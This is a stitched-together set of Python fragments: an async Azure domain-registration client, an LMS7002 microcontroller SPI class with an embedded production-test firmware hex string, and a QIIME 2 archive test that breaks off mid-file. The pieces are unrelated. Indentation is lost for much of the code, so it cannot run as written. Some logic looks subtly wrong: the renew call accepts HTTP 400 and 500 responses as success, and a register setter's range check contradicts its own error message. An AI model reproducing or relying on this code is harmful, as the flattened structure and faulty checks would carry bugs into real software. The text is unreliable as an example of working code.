        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get_ownership_identifier.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers/{name}'}  # type: ignore
    @distributed_trace_async
    async def create_or_update_ownership_identifier(
        self,
        resource_group_name: str,
        domain_name: str,
        name: str,
        domain_ownership_identifier: "_models.DomainOwnershipIdentifier",
        **kwargs: Any
    ) -> "_models.DomainOwnershipIdentifier":
        """Creates an ownership identifier for a domain or updates identifier details for an existing
        identifier.

        :param resource_group_name: Name of the resource group to which the resource belongs.
        :type resource_group_name: str
        :param domain_name: Name of domain.
        :type domain_name: str
        :param name: Name of identifier.
        :type name: str
        :param domain_ownership_identifier: A JSON representation of the domain ownership properties.
        :type domain_ownership_identifier: ~azure.mgmt.web.v2018_02_01.models.DomainOwnershipIdentifier
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: DomainOwnershipIdentifier, or the result of cls(response)
        :rtype: ~azure.mgmt.web.v2018_02_01.models.DomainOwnershipIdentifier
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.DomainOwnershipIdentifier"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        # Merge caller-supplied overrides into the status-code -> exception mapping.
        error_map.update(kwargs.pop('error_map', {}))
        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]
        _json = self._serialize.body(domain_ownership_identifier, 'DomainOwnershipIdentifier')
        request = build_create_or_update_ownership_identifier_request(
            resource_group_name=resource_group_name,
            domain_name=domain_name,
            name=name,
            subscription_id=self._config.subscription_id,
            content_type=content_type,
            json=_json,
            template_url=self.create_or_update_ownership_identifier.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize('DomainOwnershipIdentifier', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    create_or_update_ownership_identifier.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers/{name}'}  # type: ignore
    @distributed_trace_async
    async def delete_ownership_identifier(
        self,
        resource_group_name: str,
        domain_name: str,
        name: str,
        **kwargs: Any
    ) -> None:
        """Delete ownership identifier for domain.

        :param resource_group_name: Name of the resource group to which the resource belongs.
        :type resource_group_name: str
        :param domain_name: Name of domain.
        :type domain_name: str
        :param name: Name of identifier.
        :type name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        # Merge caller-supplied overrides into the status-code -> exception mapping.
        error_map.update(kwargs.pop('error_map', {}))
        request = build_delete_ownership_identifier_request(
            resource_group_name=resource_group_name,
            domain_name=domain_name,
            name=name,
            subscription_id=self._config.subscription_id,
            template_url=self.delete_ownership_identifier.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        # 200 and 204 are both success; anything else is mapped to an exception.
        if response.status_code not in [200, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        if cls:
            return cls(pipeline_response, None, {})
    delete_ownership_identifier.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers/{name}'}  # type: ignore
    @distributed_trace_async
    async def update_ownership_identifier(
        self,
        resource_group_name: str,
        domain_name: str,
        name: str,
        domain_ownership_identifier: "_models.DomainOwnershipIdentifier",
        **kwargs: Any
    ) -> "_models.DomainOwnershipIdentifier":
        """Creates an ownership identifier for a domain or updates identifier details for an existing
        identifier.

        :param resource_group_name: Name of the resource group to which the resource belongs.
        :type resource_group_name: str
        :param domain_name: Name of domain.
        :type domain_name: str
        :param name: Name of identifier.
        :type name: str
        :param domain_ownership_identifier: A JSON representation of the domain ownership properties.
        :type domain_ownership_identifier: ~azure.mgmt.web.v2018_02_01.models.DomainOwnershipIdentifier
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: DomainOwnershipIdentifier, or the result of cls(response)
        :rtype: ~azure.mgmt.web.v2018_02_01.models.DomainOwnershipIdentifier
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.DomainOwnershipIdentifier"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        # Merge caller-supplied overrides into the status-code -> exception mapping.
        error_map.update(kwargs.pop('error_map', {}))
        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]
        _json = self._serialize.body(domain_ownership_identifier, 'DomainOwnershipIdentifier')
        request = build_update_ownership_identifier_request(
            resource_group_name=resource_group_name,
            domain_name=domain_name,
            name=name,
            subscription_id=self._config.subscription_id,
            content_type=content_type,
            json=_json,
            template_url=self.update_ownership_identifier.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize('DomainOwnershipIdentifier', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    update_ownership_identifier.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers/{name}'}  # type: ignore
@distributed_trace_async
async def renew(
self,
resource_group_name: str,
domain_name: str,
**kwargs: Any
) -> None:
"""Renew a domain.
Renew a domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of the domain.
:type domain_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_renew_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
template_url=self.renew.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204, 400, 500]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
renew.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/renew'} # type: ignore
| |
#***************************************************************
#* Name: LMS7002_mSPI.py
#* Purpose: Class implementing LMS7002 mSPI functions
#* Author: Lime Microsystems ()
#* Created: 2016-11-14
#* Copyright: Lime Microsystems (limemicro.com)
#* License:
#**************************************************************
from LMS7002_base import *
import time
class LMS7002_mSPI(LMS7002_base):
    """Access to the LMS7002 on-chip microcontroller via the mSPI register block."""
    __slots__ = []  # Used to generate error on typos

    def __init__(self, chip):
        # chip: parent LMS7002 object providing register read/write access.
        self.chip = chip
        self.channel = None         # mSPI registers are not channel-specific
        # Presumably prepended to the short register names by the base class's
        # _readReg/_writeReg helpers (cf. self.chip['mSPI_STAT'] in _wait) --
        # confirm in LMS7002_base.
        self.prefix = "mSPI_"
def getOpCode(self, opCode):
if opCode == "SFR":
return 0x7E
elif opCode == "IRAM_READ":
return 0x78
elif opCode == "RESET_PC":
return 0x70
elif opCode == "RUN_INSTR":
return 0x74
else:
raise ValueError("Unknown MCU opcode :"+str(opCode))
#
# Auxiliary functions
#
def _readHex(self, hexFileName, isString=False):
"""
Read Intel hex file.
Returns a 16384 or 8192 bytes long list containing the MCU program.
"""
if not isString:
inFile = open(hexFileName, 'r')
else:
inFile = hexFileName.split('\n')
ret = [0]*16384
maxAddr = 0
for line in inFile:
line = line.strip()
if line=='':
continue
if line[0]!=':':
raise ValueError("Line does not start with :. Is this an Intel hex file?")
lineData = []
for i in range(1,len(line),2):
lineData.append(int("0x"+line[i:i+2],16))
nBytes = lineData[0]
offset = (lineData[1]<<8) + lineData[2]
recType = lineData[3]
data = lineData[4:4+nBytes]
ckSum = 0
for i in range(0, len(lineData)-1):
ckSum += lineData[i]
ckSum = ~ckSum + 1
ckSum = ckSum%256
if ckSum != lineData[len(lineData)-1]:
raise ValueError("Checksum error in line : "+line)
for i in range(0, len(data)):
if offset+i>maxAddr:
maxAddr = offset+i
ret[offset+i] = data[i]
if not isString:
inFile.close()
if maxAddr<8192:
ret = ret[:8192] # Discard last 8192 bytes, since they are not used
return ret
def loadHex(self, hexFileName, mode='SRAM', isString=False):
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
mcuProgram = self._readHex(hexFileName, isString)
self.chip._MCUProgram(mcuProgram, mode)
self.chip.SPIImmediate = immMode
    def reset(self):
        """
        Put the MCU in reset, and hold it in reset state
        """
        immMode = self.chip.SPIImmediate
        self.chip.SPIImmediate = True   # presumably forces immediate SPI writes
        # Register writes kept in this exact order; the sequence may matter to
        # the hardware.
        # NOTE(review): assigning MODE = 'RESET' is a no-op in the MODE setter
        # (it returns without writing the register) -- confirm the reset
        # sequence actually drives CFG as intended.
        self.MODE = 'RESET'
        self.DEBUG = 0      # leave debug mode
        self.EXT_INT = 0    # clear external interrupt lines
        self.RXD = 0
        self.P0 = 0         # clear port 0
        self.chip.SPIImmediate = immMode
def resetPC(self):
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
ret = self._command([self.getOpCode("RESET_PC")], 1)
self.chip.SPIImmediate = immMode
return ret
def runInstr(self):
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
data = self._command([self.getOpCode("RUN_INSTR"), 0, 0], 3)
self.chip.SPIImmediate = immMode
return data[1]*256+data[2]
def call(self, data):
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
self.P0 = 0
if data!=0:
self.SPISW_CTRL = 1
else:
self.SPISW_CTRL = 0
self.P0 = data
self.chip.SPIImmediate = immMode
def waitForMCU(self, timeout=1):
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
t0 = time.time()
while time.time()-t0<timeout:
val = self.P1
if val!= 0xFF:
break
if time.time()-t0>timeout:
raise ValueError("Timeout expired in waitForMCU")
self.chip.SPIImmediate = immMode
return val
def startDebugMode(self):
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
self.DEBUG = 1
self.chip.SPIImmediate = immMode
def exitDebugMode(self):
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
self.DEBUG = 0
self.chip.SPIImmediate = immMode
def _waitUntilWritten(self, timeout=1):
"""
Waits until WRITE_REQ=1 or timeout expires.
If timeout expires an exception is raised.
"""
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
t0 = time.time()
while (self.WRITE_REQ==1) and (time.time()-t0<timeout):
pass
self.chip.SPIImmediate = immMode
if time.time()-t0>timeout:
raise ValueError("Timeout expired in waitUntilWritten")
def _readOneByte(self, timeout=1):
"""
Waits until READ_REQ=0 or timeout expires.
If timeout expires an exception is raised.
"""
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
t0 = time.time()
while (self.READ_REQ==0) and (time.time()-t0<timeout):
pass
data = self.DFM
self.chip.SPIImmediate = immMode
if time.time()-t0>timeout:
raise ValueError("Timeout expired in readOneByte")
return data
def _command(self, writeData, bytesToReceive):
"""
Writes the data given in writeData list.
Returns bytesToReceive received bytes
"""
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
for data in writeData:
self.DTM = data
self._waitUntilWritten()
recData = []
for i in range(0, bytesToReceive):
recData.append(self._readOneByte())
self.chip.SPIImmediate = immMode
return recData
def _wait(self, n):
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
for i in range(0, n//64):
tmp = self.chip['mSPI_STAT']
self.chip.SPIImmediate = immMode
def changeMCUFrequency(self, value):
self._command( [self.getOpCode("SFR"), 0x8E, value], 3)
def readIRAM(self):
data = [0]*256
opCode = self.getOpCode("IRAM_READ")
for i in range(0,256):
res = self._command( [opCode, i, 0], 3)
data[i] = res[2]
self._wait(64)
return data
#
# mSPI_P0 (0x0000)
#
@property
def P0(self):
"""
Get the value of P0<7:0>
"""
return self._readReg('P0', 'P0<7:0>')
@P0.setter
def P0(self, value):
"""
Set the value of P0<7:0>
"""
if not(0<= value <=1023):
raise ValueError("Value must be [0..255]")
self._writeReg('P0', 'P0<7:0>', value)
#
# mSPI_P1 (0x0001)
#
@property
def P1(self):
"""
Get the value of P1<7:0>
"""
return self._readReg('P1', 'P1<7:0>')
@P1.setter
def P1(self, value):
"""
Set the value of P1<7:0>
"""
if not(0<= value <=255):
raise ValueError("Value must be [0..255]")
self._writeReg('P1', 'P1<7:0>', value)
#
# mSPI_CFG (0x0002)
#
# RXD
@property
def RXD(self):
"""
Get the value of RXD
"""
return self._readReg('CFG', 'RXD')
@RXD.setter
def RXD(self, value):
"""
Set the value of RXD
"""
if value not in [0, 1]:
raise ValueError("Value must be [0,1]")
self._writeReg('CFG', 'RXD', value)
# DEBUG
@property
def DEBUG(self):
"""
Get the value of DEBUG
"""
return self._readReg('CFG', 'DEBUG')
@DEBUG.setter
def DEBUG(self, value):
"""
Set the value of DEBUG
"""
if value not in [0, 1]:
raise ValueError("Value must be [0,1]")
self._writeReg('CFG', 'DEBUG', value)
# EXT_INT<5:2>
@property
def EXT_INT(self):
"""
Get the value of EXT_INT<5:2>
"""
return self._readReg('CFG', 'EXT_INT<5:2>')
@EXT_INT.setter
def EXT_INT(self, value):
"""
Set the value of EXT_INT<5:2>
"""
if not(0 <= value <= 15):
raise ValueError("Value must be [0..15]")
self._writeReg('CFG', 'EXT_INT<5:2>', value)
# MODE<1:0>
@property
def MODE(self):
"""
Get the value of MODE<1:0>
"""
return self._readReg('CFG', 'MODE<1:0>')
@MODE.setter
def MODE(self, Mode):
"""
Set the value of MODE<1:0>
"""
if Mode not in [0, 1,2,3, 'RESET', 'EEPROM_AND_SRAM', 'SRAM', 'SRAM_FROM_EEPROM']:
raise ValueError("Mode should be [0, 1,2,3, 'RESET', 'EEPROM_AND_SRAM', 'SRAM', 'SRAM_FROM_EEPROM']")
if Mode==0 or Mode=='RESET':
return
elif Mode==1 or Mode=='EEPROM_AND_SRAM':
mode = 1
elif Mode==2 or Mode=='SRAM':
mode = 2
else:
mode = 3
self._writeReg('CFG', 'MODE<1:0>', mode)
#
# mSPI_STAT (0x0003)
#
# TXD
@property
def TXD(self):
"""
Get the value of TXD
"""
return self._readReg('STAT', 'TXD')
@TXD.setter
def TXD(self, value):
"""
Set the value of TXD
"""
if value not in [0, 1]:
raise ValueError("Value must be [0,1]")
self._writeReg('STAT', 'TXD', value)
# PROGRAMMED
@property
def PROGRAMMED(self):
"""
Get the value of PROGRAMMED
"""
return self._readReg('STAT', 'PROGRAMMED')
# READ_REQ
@property
def READ_REQ(self):
"""
Get the value of READ_REQ
"""
return self._readReg('STAT', 'READ_REQ')
@READ_REQ.setter
def READ_REQ(self, value):
"""
Set the value of READ_REQ
"""
if value not in [0, 1]:
raise ValueError("Value must be [0,1]")
self._writeReg('STAT', 'READ_REQ', value)
# WRITE_REQ
@property
def WRITE_REQ(self):
"""
Get the value of WRITE_REQ
"""
return self._readReg('STAT', 'WRITE_REQ')
@WRITE_REQ.setter
def WRITE_REQ(self, value):
"""
Set the value of WRITE_REQ
"""
if value not in [0, 1]:
raise ValueError("Value must be [0,1]")
self._writeReg('STAT', 'WRITE_REQ', value)
# FULL_WRITE_BUFF
@property
def FULL_WRITE_BUFF(self):
"""
Get the value of FULL_WRITE_BUFF
"""
return self._readReg('STAT', 'FULL_WRITE_BUFF')
@FULL_WRITE_BUFF.setter
def FULL_WRITE_BUFF(self, value):
"""
Set the value of FULL_WRITE_BUFF
"""
if value not in [0, 1]:
raise ValueError("Value must be [0,1]")
self._writeReg('STAT', 'FULL_WRITE_BUFF', value)
# EMPTY_WRITE_BUFF
@property
def EMPTY_WRITE_BUFF(self):
"""
Get the value of EMPTY_WRITE_BUFF
"""
return self._readReg('STAT', 'EMPTY_WRITE_BUFF')
@EMPTY_WRITE_BUFF.setter
def EMPTY_WRITE_BUFF(self, value):
"""
Set the value of EMPTY_WRITE_BUFF
"""
if value not in [0, 1]:
raise ValueError("Value must be [0,1]")
self._writeReg('STAT', 'EMPTY_WRITE_BUFF', value)
#
# mSPI_DTM (0x0004)
#
@property
def DTM(self):
"""
Get the value of DTM<7:0>
"""
return self._readReg('DTM', 'DTM<7:0>')
@DTM.setter
def DTM(self, value):
"""
Set the value of DTM<7:0>
"""
if not(0<= value <=255):
raise ValueError("Value must be [0..255]")
self._writeReg('DTM', 'DTM<7:0>', value)
#
# mSPI_DFM (0x0005)
#
@property
def DFM(self):
"""
Get the value of DFM<7:0>
"""
return self._readReg('DFM', 'DFM<7:0>')
@DFM.setter
def DFM(self, value):
"""
Set the value of DFM<7:0>
"""
if not(0<= value <=255):
raise ValueError("Value must be [0..255]")
self._writeReg('DFM', 'DFM<7:0>', value)
#
# mSPI_SPISW (0x0006)
#
# SPISW_CTRL
@property
def SPISW_CTRL(self):
"""
Get the value of SPISW_CTRL
"""
return self._readReg('SPISW', 'SPISW_CTRL')
@SPISW_CTRL.setter
def SPISW_CTRL(self, value):
"""
Set the value of SPISW_CTRL
"""
if value not in [0, 1, 'BB', 'MCU']:
raise ValueError("Value must be [0,1]")
if value == 0 or value == 'BB':
val = 0
else:
val = 1
self._writeReg('SPISW', 'SPISW_CTRL', val)
    def getProductionTestHex(self):
        """Return the built-in production-test MCU firmware image as an Intel
        hex string, suitable for loadHex(..., isString=True)."""
        return """:06000000020041020108AC
:03000B00020412DA
:03001300020120C7
:03001B000204AB31
:030023000207A829
:03002B000207D9F0
:01003300329A
:03003B0002079821
:03009A0002003E23
:03003E0002082194
:20009D00752F7F7582FF75830374A1F074FFE0F530C394A17002C27878FE75BF0374A2F259
:2000BD0074FFE2F531C394A27002C27979FD75BF0374A3F374FFE3F532C394A37002C27A26
:2000DD00750FA4740FF8E6F533C394A47002C27B790E77A5E50EF534C394A57002C27C003D
:2000FD0075EC3575880575A8850022C0E0C0D074A6F535C394A67004C27DC2A80000D0D059
:20011D00D0E032C0E0C0D074A7F536C394A77004C27EC2AA0000D0D0D0E032752F77758CAE
:20013D001F758A52758DFE758BA375891075885075A88A752B07752C070022752F7775ECA0
:20015D0011758CFC758AFC758DFC758BFE75896675885075A88A752B07752C070022752F10
:20017D007775A8A075CAA375CBFE75CCA375CDFE75C80C752D070022752F7775EC11758C48
:20019D00FE758A0A75890175881075A882759800C29FD29E75CA9F75CBFF75CC9F75CDFF74
:2001BD0075C804D2CC752B07752D007599AA0022752F7775EC11758921758CFE758A0A75F7
:2001DD008BF0758DF075878075885075A882759800C29FD29ED29C752C00752B07752D00F7
:2001FD000022752F7775EC1175ED35758CFC758AFE758DFC758BFC7589EE75885075A88AC8
:20021D00752B07752C07752D000022752FFF752B647520007521017522027523037524040A
:20023D00752505752606752707E52B79A0F794647002C2787401C2D3C2D478202879A1F789
:20025D0094217002C279742179242979A2F794457002C27A74457924989979A3F79401708C
:20027D0002C27B7401D2D3C2D47821792526F5F027F5F079A4F794077002C27C74077821B1
:20029D0079259697F5F0C2D3D2D47822792625222526F5F079A5F794097002C27D7409794D
:2002BD0026952297F5F0D2D3D2D478237927262407F5F079A6F7740B7927940397F5F0794B
:2002DD00A7F77401C2D3C2D478237921D3383735253401F5F079A8F7742C782304F5F00894
:2002FD0088F0E8F5F079A9F794247002C27EE521792107E779AAF794027002C27F00227591
:20031D002FFFC2D3C2D4752B0578087508077F0374055F79B0F794017002C27874085679B8
:20033D00B1F794007002C2797409522B532B0FE52B79B2F794017002C27A74014F752B0C4B
:20035D00452B79B3F7940F7002C27B7403464401422BE52B79B4F7940F7002C27C740F68BA
:20037D00652B66640579B5F7940A7002C27D632B05E52B79B6F7940A7002C27E740FF4C439
:20039D002333333333130379B7F794787002C27F0022752FFFD3C3D200C200400679C07770
:2003BD00AAC278B3500679C177AAC279B20000B20010000679C277AAC27A8200B000400613
:2003DD0079C377AAC27B7200400679C477AAC27CC3400679C577AAC27DA000500679C677BF
:2003FD00AAC27ED200A200B3920010000679C777AAC27F0022C0E0C007C000C0D075D00067
:20041D007828B60210E52B2440F8A62B758C1E758AA30080527828B6030AE52B2450F8A602
:20043D002B0080437828B6051CE52B2470F8A62BE52B94007006C2CCC299C2CA758CFE75CA
:20045D008A0A0080227828B60610E52B2480F8A62B758CFE758A0A00800D7828B60708E581
:20047D002B2490F8A62B00782CE6C454F0FF782BE62F782FF6782BE67006C28CC2A9800594
:20049D00782B16D28CD0D0D000D007D0E032C0E0C007C000C0D075D0007828B6020E758D9B
:2004BD00FE758BA3E52C2448F8A62C007828B60308E52C2458F8A62C007828B60708E52C09
:2004DD002498F8A62C00782CE6C454F0FF782BE62F782FF6782CE67006C28EC2AB800578D9
:2004FD002C16D28ED0D0D000D007D0E032752FFF78000874FE48F8740F58F818740F98F841
:20051D00D8027802D3740138C328780668B40006788876AAC27879000974FE49F9740F59F3
:20053D00F919740F99F9D9027902D3740139C329790669B40006788976AAC2797A000A74BE
:20055D00FE4AFA740F5AFA1A740F9AFADA027A02D374013AC32A7A066AB40006788A76AAA7
:20057D00C27A7B000B74FE4BFB740F5BFB1B740F9BFBDB027B02D374013BC32B7B066BB46C
:20059D000006788B76AAC27B7C000C74FE4CFC740F5CFC1C740F9CFCDC027C02D374013CA4
:2005BD00C32C7C066CB40006788C76AAC27C7D000D74FE4DFD740F5DFD1D740F9DFDDD02E9
:2005DD007D02D374013DC32D7D066DB40006788D76AAC27D7E000E74FE4EFE740F5EFE1EB5
:2005FD00740F9EFEDE027E02D374013EC32E7E066EB40006788E76AAC27E7F000F74FE4F87
:20061D00FF740F5FFF1F740F9FFFDF027F02D374013FC32F7F066FB40006788F76AAC27FAC
:20063D0022752FFF74FF75F0FFA4B4010F78B8F6C278E5F0B4FE05C27978B9F674AA75F0C8
:20065D00BBA4B42E0F78BAF6C27AE5F0B47C05C27B78BBF674CC75F099A4B4EC0F78BCF69E
:20067D00C27CE5F0B47905C27D78BDF6740075F0FFA4B4000F78BEF6C27EE5F0B4000578FD
:20069D00BFF6C27F22752FFF74FF75F00184B4FF0F78C8F6C278E5F0B40005C27978C9F6F3
:2006BD0074AA75F00B84B40F0F78CAF6C27AE5F0B40505C27B78CBF674CC75F00984B416C0
:2006DD000F78CCF6C27CE5F0B40605C27D78CDF674FF75F00084B4000F78CEF6C27EE5F0F8
:2006FD00B4000578CFF6C27F22752FFFC340057537A8C278D350037537A8D2002000037567
:20071D0037003000057538A9C27910000375380074AA700375380074006003753800752B9D
:20073D0000B52B037539AA746FB46F05753AABC27A747F7903B90103753A007820752007B1
:20075D00B60705753BACC27B752B01D52B05753CADC27CF180753EAF7801D805753FB0C290
:20077D007DE194740290078673E18BE18E00753C00753DAEC27E2200C27F22C000C0D075EE
:20079D00D00078297601D0D0D00032C0E0C007C000C0D075D000309816782C7600782CE634
:2007BD00C454F0FF782BE62F782FF6C28EC2ACC298C299D0D0D000D007D0E032C0E0C001C3
:2007DD00C000C0D075D000C2CFC2CEE52D2460F8A62D00782D792FE6F7782DE67006C2CA2E
:2007FD00C2AD8003782D16D0D0D000D001D0E03278F0760078F0B6FA00500800000078F056
:20081D000680F1227581D075800F75900075A2FF7591FF75A10778FF74000075880075A915
:20083D000475A880782976007829B601FB7829760078287601782886907828B60F0050E80F
:20085D007828B6010A782E760212009D0209267828B6020A782E7632120138020926782850
:20087D00B6030A782E76321201580209267828B6040A782E763212017B0209267828B605E2
:20089D000A782E76321201950209267828B6060A782E76321201CD0209267828B6070A7866
:2008BD002E76321201FF0209267828B60809782E760212022880527828B60909782E7602E9
:2008DD0012031C80447828B60A09782E76021203AF80367828B60B09782E760212070680DE
:2008FD00287828B60C09782E760212050A801A7828B60D09782E760212063E800C7828B6AD
:20091D000E07782E76021206A2782A7601782A792EC3E796401D12080D75800E12080D7508
:20093D00800F12080D75800D12080D75800F782A0680DA12080D782FE6700A782806782841
:14095D0086900208567828743026F5907828760F020856227A
:06007000E478FFF6D8FD64
:20004E007900E94400601B7A00900975780075A000E493F2A308B8000205A0D9F4DAF275DB
:02006E00A0FFF1
:200076007800E84400600A790075A000E4F309D8FC7800E84400600C7900900000E4F0A38A
:04009600D8FCD9FABF
:0D004100758120120971E582600302003E06
:040971007582002269
:00000001FF
"""
| |
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2020, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import os
import tempfile
import unittest
import uuid
import zipfile
import pathlib
from qiime2.core.archive import Archiver
from qiime2.core.archive import ImportProvenanceCapture
from qiime2.core.archive.archiver import _ZipArchive
from qiime2.core.archive.format.util import artifact_version
from qiime2.core.testing.format import IntSequenceDirectoryFormat
from qiime2.core.testing.type import IntSequence1
from qiime2.core.testing.util import ArchiveTestingMixin
class TestArchiver(unittest.TestCase, ArchiveTestingMixin):
    """Exercise saving and loading of QIIME 2 zip archives via Archiver."""

    def setUp(self):
        self.temp_dir = tempfile.TemporaryDirectory(prefix="qiime2-test-temp-")

        # Initialize an Archiver. The values passed to the constructor mostly
        # don't matter to the Archiver, but we'll pass valid Artifact test data
        # anyways in case Archiver's behavior changes in the future.
        def data_initializer(data_dir):
            with open(os.path.join(str(data_dir), 'ints.txt'), 'w') as fh:
                fh.write('1\n2\n3\n')

        self.archiver = Archiver.from_data(
            IntSequence1, IntSequenceDirectoryFormat,
            data_initializer=data_initializer,
            provenance_capture=ImportProvenanceCapture())

    def tearDown(self):
        # Remove everything written under the per-test temporary directory.
        self.temp_dir.cleanup()
def test_save_invalid_filepath(self):
# Empty filepath.
with self.assertRaisesRegex(FileNotFoundError, 'No such file'):
self.archiver.save('')
# Directory.
with self.assertRaisesRegex(IsADirectoryError, 'directory'):
self.archiver.save(self.temp_dir.name)
# Ends with path separator (no basename, e.g. /tmp/foo/).
with self.assertRaises((IsADirectoryError, FileNotFoundError)):
self.archiver.save(os.path.join(self.temp_dir.name, 'foo', ''))
def test_save_excludes_dotfiles_in_data_dir(self):
def data_initializer(data_dir):
data_dir = str(data_dir)
fp = os.path.join(data_dir, 'ints.txt')
with open(fp, 'w') as fh:
fh.write('1\n')
fh.write('2\n')
fh.write('3\n')
hidden_fp = os.path.join(data_dir, '.hidden-file')
with open(hidden_fp, 'w') as fh:
fh.write("You can't see me if I can't see you\n")
hidden_dir = os.path.join(data_dir, '.hidden-dir')
os.mkdir(hidden_dir)
with open(os.path.join(hidden_dir, 'ignored-file'), 'w') as fh:
fh.write("I'm ignored because I live in a hidden dir :(\n")
archiver = Archiver.from_data(
IntSequence1, IntSequenceDirectoryFormat,
data_initializer=data_initializer,
provenance_capture=ImportProvenanceCapture())
fp = os.path.join(self.temp_dir.name, 'archive.zip')
archiver.save(fp)
root_dir = str(archiver.uuid)
expected = {
'VERSION',
'checksums.md5',
'metadata.yaml',
'data/ints.txt',
'provenance/metadata.yaml',
'provenance/VERSION',
'provenance/citations.bib',
'provenance/action/action.yaml'
}
self.assertArchiveMembers(fp, root_dir, expected)
def test_save_archive_members(self):
fp = os.path.join(self.temp_dir.name, 'archive.zip')
self.archiver.save(fp)
root_dir = str(self.archiver.uuid)
expected = {
'VERSION',
'checksums.md5',
'metadata.yaml',
'data/ints.txt',
'provenance/metadata.yaml',
'provenance/VERSION',
'provenance/citations.bib',
'provenance/action/action.yaml'
}
self.assertArchiveMembers(fp, root_dir, expected)
def test_load_archive(self):
fp = os.path.join(self.temp_dir.name, 'archive.zip')
self.archiver.save(fp)
archiver = Archiver.load(fp)
self.assertEqual(archiver.uuid, self.archiver.uuid)
self.assertEqual(archiver.type, IntSequence1)
self.assertEqual(archiver.format, IntSequenceDirectoryFormat)
self.assertEqual({str(p.relative_to(archiver.data_dir))
for p in archiver.data_dir.iterdir()},
{'ints.txt'})
def test_load_ignores_root_dotfiles(self):
fp = os.path.join(self.temp_dir.name, 'archive.zip')
self.archiver.save(fp)
# Add some dotfiles to the archive.
with zipfile.ZipFile(fp, mode='a') as zf:
zf.writestr('.DS_Store', "The world's most beloved file\n")
zf.writestr('.hidden-file',
"You can't see me if I can't see you\n")
zf.writestr('.hidden-dir/ignored-file',
"I'm ignored because I live in a hidden dir :(\n")
# Assert the expected files exist in the archive to verify this test
# case is testing what we want it to.
with zipfile.ZipFile(fp, mode='r') as zf:
root_dir = str(self.archiver.uuid)
expected = {
'.DS_Store',
'.hidden-file',
